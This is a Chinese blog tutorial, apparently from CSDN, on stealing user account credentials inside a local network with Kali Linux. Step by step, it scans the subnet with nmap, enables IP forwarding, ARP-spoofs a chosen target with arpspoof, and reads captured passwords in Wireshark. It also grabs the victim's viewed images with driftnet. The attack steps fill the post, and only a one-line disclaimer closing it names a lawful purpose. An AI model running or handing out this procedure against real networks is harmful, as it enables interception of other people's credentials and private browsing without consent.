kali linux 获取ip_kali内网渗透之盗取用户账号信息

c49b3ed4d79674c14a24e0d79682a7a9.png

kali内网渗透之盗取用户账号信息(使用的是kali-linux-2020-1a)

一、查看一下自己的ip地址以及网卡信息和子网掩码,可以看到本机的ip地址为192.168.1.109,网卡为eth0

sudo ifconfig

21252773b56f5802daf308ad97b5efc8.png

二、利用nmap工具扫描同一局域网内的主机并选择攻击目标,这里我们选择我的另一台电脑 192.168.1.101

nmap -sP 192.168.1.0/24

77c57a12c31eb3edfc50f987241a3d21.png

三、利用ARP欺骗让目标主机的流量经过主机的网卡,再从网关出去,而网关也会把原本流入目标机的流量经过我。

1、在进行arp欺骗之前,我们要先开启本机的IP转发功能,如果不开启的话,我们攻击之后会使目标机断网,而不是欺骗。

echo 1 > /proc/sys/net/ipv4/ip_forward

b82f23a05f5b8e48a469a4d1dccbf699.png

2、对目标主机进行欺骗,如果没有arpspoof可以使用sudo apt-get install dsniff 安装

sudo apt-get install dsniff
arpspoof -i eth0 -t 192.168.1.101 192.168.1.1

68616f8d5025d7a90b2ee73872c639b9.png

四、使用wireshark抓取经过本机eth0网卡的数据包

2af306e4600c7e43a25ff64a5f400b6f.png

fa279a2afc78944a4d67584efca3f5c2.png

五、当被攻击主机访问网站输入用户密码可以在wireshark中找到对应的数据包并取得用户名密码

ac150057bc40c4efb10a6fc30f82702f.png

d26a381ddcff69dae3ff10ad0210a3bf.png

六、另外做了内网欺骗后还可以截取到目标主机上浏览的图片,是不是很赞!

driftnet -i eth0

69ce1abf4f24743415e19980202e1d53.png

最后,此文只是向大家展示一下内网渗透的相关过程,任何人不得用于违法犯罪,否则与本人无关,安全上网,人人有责。

  • 3
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值